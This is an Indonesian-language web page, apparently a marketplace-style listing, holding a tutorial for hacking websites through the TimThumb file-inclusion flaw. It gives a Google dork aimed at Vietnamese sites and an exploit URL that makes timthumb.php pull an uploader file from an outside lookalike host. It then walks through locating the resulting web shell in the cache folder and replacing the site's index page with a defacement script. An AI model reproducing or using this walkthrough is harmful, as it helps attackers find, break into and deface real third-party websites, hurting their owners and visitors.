| Terjual |
: |
0 |
Disukai |
: |
0 |
| Dilihat |
: |
246 |
Stok |
: |
0 |
=>> Dork :
inurl:/timthumb.php site:vn
=>> Exploit :
=?src=http://flickr.com.ehpet.net/uploader.php
=>> Tutorial :
1.Cari target dengan dork tapi kita kali ini akan cari target di google gambar
Contoh :
inurl:/timthumb.php site:vn
2. Pilih salah satu website
3. Kalau sudah dapat website , kita langsung masukan exploit nya dengan menambahkan di belakang site
/timthumb.php
contoh :
www.D4RK51D3.com/timthumb.php
Klo vuln ada tulisan Timthumb version 1.30
4. Jika sdh dapat yg vuln masukin exploit tadi
Jadi :
www.D4RK51D3.com/timthumb.php?src=http://flickr.com.ehpet.net/u
ploader.php
5. Copy tulisan mulai dari /chache/upload/externalblabla.php
6. Paste di belakang site. Jadi tinggal hapus exploit tadi :
/timthumb.php/srcblabla
7. copy /chache/upload/upz.php
8. Hasil nya : www.D4RK51D3.com.vn/chache/upload/upz.php
=>>Tebas index
* cari “index.htmlâ€
Dan kita ganti sript deface kita, tapi sebelumnya backup dulu indexnya
Karena kasihan adminnya
0 Ulasan
